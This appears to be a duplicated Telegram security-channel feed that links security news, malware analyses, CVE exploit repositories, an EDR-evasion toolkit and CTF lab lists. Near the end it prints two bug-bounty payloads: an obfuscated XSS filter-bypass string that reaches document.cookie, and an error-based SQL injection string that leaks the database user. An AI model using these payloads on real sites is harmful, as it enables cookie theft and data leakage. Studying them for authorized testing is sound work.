🔥 Researchers have developed a new PoC exploit for a critical PaperCut server vulnerability that can bypass all current detections, allowing attackers to execute arbitrary code with SYSTEM privileges.
Learn details here: https://thehackernews.com/2023/05/researchers-uncover-new-exploit-for.html
Cisco has warned of a critical vulnerability (CVE-2023-20126) in SPA112 2-Port Phone Adapters that could allow remote attackers to execute arbitrary code.
Learn more: https://thehackernews.com/2023/05/cisco-warns-of-vulnerability-in-popular.html
Upgrade now to protect your devices!
@Engineer_Computer
Learn details here: https://thehackernews.com/2023/05/researchers-uncover-new-exploit-for.html
Cisco has warned of a critical vulnerability (CVE-2023-20126) in SPA112 2-Port Phone Adapters that could allow remote attackers to execute arbitrary code.
Learn more: https://thehackernews.com/2023/05/cisco-warns-of-vulnerability-in-popular.html
Upgrade now to protect your devices!
@Engineer_Computer
هوش مصنوعی Bing در دسترس عموم قرار گرفتفقط لازم هست مرورگر اج رو نصب کنید تا تجربه استفاده از GPT-4 رو به صورت رایگان داشته باشید
bing.com
@Engineer_Computer
bing.com
@Engineer_Computer
💠 Top Resources For BugHunting - A Comprehensive Guide.
🔗 https://hacklido.com/blog/410-top-resources-for-bughunting-a-comprehensive-guide
@Engineer_Computer
🔗 https://hacklido.com/blog/410-top-resources-for-bughunting-a-comprehensive-guide
@Engineer_Computer
HACKLIDO
Top Resources For BugHunting - A Comprehensive Guide.
Hello, fellow BugHunters! It’s 0×2458, here with an exciting new blog that’s going to take your bug-hunting skills to the next level! Get ready to dive de...
Malware analysis
1. RecordBreaker Stealer
https://asec.ahnlab.com/en/52072
2. KEKW Malware
https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution
@Engineer_Computer
1. RecordBreaker Stealer
https://asec.ahnlab.com/en/52072
2. KEKW Malware
https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution
@Engineer_Computer
ASEC
RecordBreaker Stealer Distributed via Hacked YouTube Accounts - ASEC
RecordBreaker Stealer Distributed via Hacked YouTube Accounts ASEC
Red Team Tactics
1. Finding 0-day vulnerabilities in apps using the Red Team approach
https://redteamrecipe.com/Finding-0-day-vulnerabilities-in-apps-using-the-Red-Team-approach
2. RUST payload toolkit for bypassing EDRs
https://github.com/optiv/Freeze.rs
@Engineer_Computer
1. Finding 0-day vulnerabilities in apps using the Red Team approach
https://redteamrecipe.com/Finding-0-day-vulnerabilities-in-apps-using-the-Red-Team-approach
2. RUST payload toolkit for bypassing EDRs
https://github.com/optiv/Freeze.rs
@Engineer_Computer
ExpiredDomains.com
redteamrecipe.com is for sale! Check it out on ExpiredDomains.com
Buy redteamrecipe.com for 195 on GoDaddy via ExpiredDomains.com. This premium expired .com domain is ideal for establishing a strong online identity.
👍1
⭕️ Dangerous Regular Expressions
تو این پست Vickie Li از خطا های رایج در رجکس میگه و چندتا Best Practice برای رجکس های امن تر مثل اینکه:
- تا جایی که میشه برای چیزهایی مثل یوزرنیم و پسورد و ... خودتون رجکس ننویسید از رجکس های امن توی اینترنت استفاده کنید
- از Defense-in-depth استفاده کنید یعنی فقط به رجکس و اعتبار سنجی اش و ... اطمینان نکنید
- همچنین Fuzzing میتونه از اینکه رجکس شما داره درست کار میکنه یا نه اطمینان بیشتری حاصل کنه.
مطالعه بیشتر:
https://sec.okta.com/articles/2020/07/dangerous-regular-expressions
یه سری منابع هم معرفی شده برای امن تر کردن رجکس هاتون
https://owasp.org/www-community/OWASP_Validation_Regex_Repository
https://regexlib.com/DisplayPatterns.aspx
https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html
#regex #security #AppSec
@Engineer_Computer
تو این پست Vickie Li از خطا های رایج در رجکس میگه و چندتا Best Practice برای رجکس های امن تر مثل اینکه:
- تا جایی که میشه برای چیزهایی مثل یوزرنیم و پسورد و ... خودتون رجکس ننویسید از رجکس های امن توی اینترنت استفاده کنید
- از Defense-in-depth استفاده کنید یعنی فقط به رجکس و اعتبار سنجی اش و ... اطمینان نکنید
- همچنین Fuzzing میتونه از اینکه رجکس شما داره درست کار میکنه یا نه اطمینان بیشتری حاصل کنه.
مطالعه بیشتر:
https://sec.okta.com/articles/2020/07/dangerous-regular-expressions
یه سری منابع هم معرفی شده برای امن تر کردن رجکس هاتون
https://owasp.org/www-community/OWASP_Validation_Regex_Repository
https://regexlib.com/DisplayPatterns.aspx
https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html
#regex #security #AppSec
@Engineer_Computer
Okta Security
Dangerous Regular Expressions
Photo by Milan De Clercq on UnsplashIn this post, I will ta
👍2😁1
🔱 FREE LABS FOR RED TEAM/BLUE TEAM - 2023 🔱
· Attack-Defense - https://attackdefense.com
· Alert to win - https://alf.nu/alert1
· Bancocn - https://bancocn.com
· CTF Komodo Security - https://ctf.komodosec.com
· CryptoHack - https://cryptohack.org/
· CMD Challenge - https://cmdchallenge.com
· Explotation Education - https://exploit.education
· Google CTF - https://lnkd.in/e46drbz8
· HackTheBox - https://www.hackthebox.com
· Hackthis - https://www.hackthis.co.uk
· Hacksplaining - https://lnkd.in/eAB5CSTA
· Hacker101 - https://ctf.hacker101.com
· Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
· Hacking-Lab - https://hacking-lab.com/
· HSTRIKE - https://hstrike.com
· ImmersiveLabs - https://immersivelabs.com
· NewbieContest - https://lnkd.in/ewBk6fU5
· OverTheWire - https://overthewire.org
· Practical Pentest Labs - https://lnkd.in/esq9Yuv5
· Pentestlab - https://pentesterlab.com
· Hackaflag BR - https://hackaflag.com.br/
· Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
· PentestIT LAB - https://lab.pentestit.ru
· PicoCTF - https://picoctf.com
· PWNABLE - https://lnkd.in/eMEwBJzn
· Root-Me - https://www.root-me.org
· Root in Jail - https://rootinjail.com
· SANS Challenger - https://lnkd.in/e5TAMawK
· SmashTheStack - https://lnkd.in/eVn9rP9p
· The Cryptopals Crypto Challenges - https://cryptopals.com
· Try Hack Me - https://tryhackme.com
· Vulnhub - https://www.vulnhub.com
· W3Challs - https://w3challs.com
· WeChall - https://www.wechall.net
· Zenk-Security - https://lnkd.in/ewJ5rNx2
· Cyberdefenders - https://lnkd.in/dVcmjEw8
· LetsDefend- https://letsdefend.io/
@Engineer_Computer
· Attack-Defense - https://attackdefense.com
· Alert to win - https://alf.nu/alert1
· Bancocn - https://bancocn.com
· CTF Komodo Security - https://ctf.komodosec.com
· CryptoHack - https://cryptohack.org/
· CMD Challenge - https://cmdchallenge.com
· Explotation Education - https://exploit.education
· Google CTF - https://lnkd.in/e46drbz8
· HackTheBox - https://www.hackthebox.com
· Hackthis - https://www.hackthis.co.uk
· Hacksplaining - https://lnkd.in/eAB5CSTA
· Hacker101 - https://ctf.hacker101.com
· Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
· Hacking-Lab - https://hacking-lab.com/
· HSTRIKE - https://hstrike.com
· ImmersiveLabs - https://immersivelabs.com
· NewbieContest - https://lnkd.in/ewBk6fU5
· OverTheWire - https://overthewire.org
· Practical Pentest Labs - https://lnkd.in/esq9Yuv5
· Pentestlab - https://pentesterlab.com
· Hackaflag BR - https://hackaflag.com.br/
· Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
· PentestIT LAB - https://lab.pentestit.ru
· PicoCTF - https://picoctf.com
· PWNABLE - https://lnkd.in/eMEwBJzn
· Root-Me - https://www.root-me.org
· Root in Jail - https://rootinjail.com
· SANS Challenger - https://lnkd.in/e5TAMawK
· SmashTheStack - https://lnkd.in/eVn9rP9p
· The Cryptopals Crypto Challenges - https://cryptopals.com
· Try Hack Me - https://tryhackme.com
· Vulnhub - https://www.vulnhub.com
· W3Challs - https://w3challs.com
· WeChall - https://www.wechall.net
· Zenk-Security - https://lnkd.in/ewJ5rNx2
· Cyberdefenders - https://lnkd.in/dVcmjEw8
· LetsDefend- https://letsdefend.io/
@Engineer_Computer
❤2👍2🔥2🎉1
Malware analysis
1. AndoryuBot
https://www.fortinet.com/blog/threat-research/andoryubot-new-botnet-campaign-targets-ruckus-wireless-admin-remote-code-execution-vulnerability-cve-2023-25717
2. AsyncRAT Loader
https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader
@Engineer_Computer
1. AndoryuBot
https://www.fortinet.com/blog/threat-research/andoryubot-new-botnet-campaign-targets-ruckus-wireless-admin-remote-code-execution-vulnerability-cve-2023-25717
2. AsyncRAT Loader
https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader
@Engineer_Computer
Fortinet Blog
AndoryuBot – New Botnet Campaign Targets Ruckus Wireless Admin Remote Code Execution Vulnerability (CVE-2023-25717)
FortiGuard Labs details how a unique botnet leverages a Ruckus vulnerability and examines its behavior once inside an infected device. Learn more.…
exploit
1.CVE-2023-20052:
Information leak vulnerability in the DMG file parser of ClamAV
https://github.com/nokn0wthing/CVE-2023-25002
2. Exploits for CVE-2023-27327, CVE-2023-27328
(Parallels Desktop VM)
https://github.com/kn32/parallels-plist-escape
3. CVE-2023-28231:
DHCP Server RCE (2008 R2 SP1 - Server 2019)
https://github.com/glavstroy/CVE-2023-28231
@Engineer_Computer
1.CVE-2023-20052:
Information leak vulnerability in the DMG file parser of ClamAV
https://github.com/nokn0wthing/CVE-2023-25002
2. Exploits for CVE-2023-27327, CVE-2023-27328
(Parallels Desktop VM)
https://github.com/kn32/parallels-plist-escape
3. CVE-2023-28231:
DHCP Server RCE (2008 R2 SP1 - Server 2019)
https://github.com/glavstroy/CVE-2023-28231
@Engineer_Computer
GitHub
GitHub - nokn0wthing/CVE-2023-20052: CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV
CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV - nokn0wthing/CVE-2023-20052
Demystifying_Soft_Sec_Vulns.pdf
623.9 KB
Research
Sec code review
Bug, Fault, Error, or Weakness: Demystifying Software Security Vulnerabilities", 2023
]-> NIST Vulnerability Data Ontology:
https://github.com/usnistgov/vulntology
@Engineer_Computer
Sec code review
Bug, Fault, Error, or Weakness: Demystifying Software Security Vulnerabilities", 2023
]-> NIST Vulnerability Data Ontology:
https://github.com/usnistgov/vulntology
@Engineer_Computer
Alert! 9 new ransomware families emerge from leaked Babuk source code, capable of targeting Linux and ESXi environments
https://thehackernews.com/2023/05/babuk-source-code-sparks-9-new.html
@Engineer_Computer
https://thehackernews.com/2023/05/babuk-source-code-sparks-9-new.html
@Engineer_Computer
Injecting Payload In Phone Numbers field !
#infosec #bugbountytip #cybersecuritytips
@Engineer_Computer
#infosec #bugbountytip #cybersecuritytips
@Engineer_Computer
XSS WAF Bypass using location concatenation:
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#bugbounty #bugbountytips #xss #xssbypass
@Engineer_Computer
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#bugbounty #bugbountytips #xss #xssbypass
@Engineer_Computer
Some recent lessons learned:
If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving.
Payload example:
' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #
#bugbountytips #BugBounty
@Engineer_Computer
If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving.
Payload example:
' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #
#bugbountytips #BugBounty
@Engineer_Computer